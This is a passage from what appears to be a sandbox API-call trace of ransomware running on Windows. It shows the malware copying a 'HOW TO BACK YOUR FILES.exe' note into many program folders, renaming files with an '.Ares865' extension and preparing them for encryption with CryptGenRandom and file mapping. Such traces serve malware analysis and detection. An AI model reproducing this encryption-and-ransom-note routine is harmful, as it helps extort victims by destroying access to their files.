10.0\\Reader\\Browser") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser" [0061.485] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser" [0061.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.491] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.491] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5626be20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5626be20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.491] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.492] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT.Ares865") returned 75 [0061.492] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cat.ares865"), dwFlags=0x1) returned 1 [0061.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0061.494] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7680) returned 1 [0061.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3450020 [0061.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0061.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.495] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.496] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.497] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.497] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2100, lpName=0x0) returned 0x164 [0061.503] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2100) returned 0x1a0000 [0061.506] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.507] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.507] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0061.508] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR" [0061.508] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR" [0061.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.519] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.519] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802ba700, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x562b80e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x562b80e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.519] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.519] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT.Ares865") returned 71 [0061.519] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cat.ares865"), dwFlags=0x1) returned 1 [0061.521] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0061.522] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7680) returned 1 [0061.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3450020 [0061.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0061.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0061.522] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.523] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.523] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.523] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2100, lpName=0x0) returned 0x164 [0061.524] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2100) returned 0x1a0000 [0061.525] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0061.526] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.526] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.526] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0061.527] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl" [0061.527] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl" [0061.527] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.527] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.531] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x562de240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x562de240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.532] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.532] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.532] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files", iMaxLength=260 | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0061.532] lstrcatW (in: lpString1="", lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0061.532] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.532] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.536] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.536] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x562de240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x562de240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.536] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.536] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar") returned="C:\\Program Files\\Windows Sidebar" [0061.536] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar" | out: lpString1="C:\\Program Files\\Windows Sidebar") returned="C:\\Program Files\\Windows Sidebar" [0061.536] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.536] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.540] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.540] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x563043a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x563043a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.541] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Shared Gadgets", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Shared Gadgets") returned="C:\\Program Files\\Windows Sidebar\\Shared Gadgets" [0061.541] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Shared Gadgets" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Shared Gadgets") returned="C:\\Program Files\\Windows Sidebar\\Shared Gadgets" [0061.541] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.541] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\shared gadgets\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.545] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.545] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x563043a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x563043a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.545] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.545] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.545] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets") returned="C:\\Program Files\\Windows Sidebar\\Gadgets" [0061.545] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets") returned="C:\\Program Files\\Windows Sidebar\\Gadgets" [0061.545] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.545] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.551] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.551] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x563043a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x563043a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.551] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.551] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget" [0061.551] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget" [0061.552] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.552] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.565] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.565] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5632a500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5632a500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.565] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.565] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.565] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" [0061.566] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" [0061.566] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.566] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.574] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.574] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56350660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56350660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.576] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.576] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.586] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI" [0061.586] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI" [0061.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.586] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.593] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x563767c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x563767c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.593] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.593] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.593] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI" [0061.593] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI" [0061.593] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.593] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.602] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x563767c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x563767c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.602] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.602] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.602] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US" [0061.602] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US" [0061.602] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR 